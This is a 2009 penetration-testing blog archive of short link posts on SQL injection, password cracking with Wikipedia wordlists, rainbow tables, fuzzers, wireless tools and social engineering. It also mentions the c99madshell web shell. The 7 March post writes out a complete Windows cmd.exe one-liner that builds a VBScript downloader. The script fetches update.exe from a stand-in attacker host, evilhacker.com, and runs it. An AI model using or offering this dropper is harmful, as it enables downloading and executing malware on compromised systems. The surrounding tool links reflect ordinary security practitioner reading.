Wednesday, March 25, 2009

SQL Injection Not Just 1=1 Slides

Good slide deck on SQLMap - one of those greatly underestimated tools:

Cracking passwords with Wikipedia

Sebastien Raveau shares his secret with cracking passwords using not the dictionary, but Wikipeda. Combine this with the wordlist based rainbow tables and you have quite the effective cracking machine.
Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc

You can find Sebastien on Twitter: @sraveau



Saturday, March 21, 2009

How to present while people are twittering

Not technical but a very good article for presenters in this twitter/socmed age:
http://pistachioconsulting.com/twitter-presentations/

Saturday, March 14, 2009

Wireless Security Tools

Stumbled across this list of Wireless tools
http://www.corecom.com/html/wlan_tools.html

SQL Injection for Oracle (pdf)

Free Tools - Inguardians

Free Tools - Joshua Wright

Free Tools - SecureState

Uninformed PT and RE ezine

Preventing SEH Overwrites

The "Ultimate" list of Fuzzers

Doesn't seem very "Ultimate" but its a good list:
http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

c99madshell.php

Active Man in the Middle Attack

Friday, March 13, 2009

Social Engineering Webcast

Chris Nickerson and Mike Murray put on a good webinar about Social Engineering. Check out the recording and slide deck here:
http://www.ethicalhacker.net/content/view/242/2/

Wednesday, March 11, 2009

Shell Greed

On twitter I post a long shell command that would boot/kick off a system every other user. @marcinw made it shorter and I submitted it to Shell-fu.org. Today they posted it live. Here is the link:
http://www.shell-fu.org/lister.php?id=558

Tuesday, March 10, 2009

HTML to PDF

The site just just as it says. Has a ton of applications, but the one I'm interested in at the moment, is using to to throw things on my Kindle for later reading.
http://www.html-pdf-converter.com/

Abusing Citrix - Part 1

PHP Shell Injection through PHP Log Parsing

Monday, March 9, 2009

Public Rainbow-Tables

Oldie but a goodie that you just might not know about:
http://www.plain-text.info


Saturday, March 7, 2009

One LONG line wget for windows

"cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\getnrun.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\getnrun.vbs & echo Dim BinaryStream >> C:\windows\getnrun.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\getnrun.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\getnrun.vbs & echo BinaryStream.Open >> C:\windows\getnrun.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\getnrun.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\getnrun.vbs & echo Function BinaryGetURL(URL) >> C:\windows\getnrun.vbs & echo Dim Http >> C:\windows\getnrun.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\getnrun.vbs & echo Http.Open "GET", URL, False >> C:\windows\getnrun.vbs & echo Http.Send >> C:\windows\getnrun.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\getnrun.vbs & echo End Function >> C:\windows\getnrun.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\getnrun.vbs & echo shell.Run "C:\update.exe" >> C:\windows\getnrun.vbs & start C:\windows\getnrun.vbs http://evilhacker.com/update.exe C:\update.exe"

Friday, March 6, 2009

Fact/Fiction Book by Jayson Street

Check out the site for some sneak peeks into the Fact/Fiction book coming out BH USA / DefCon timeframe!
The Story is F1ct10n The threats are real.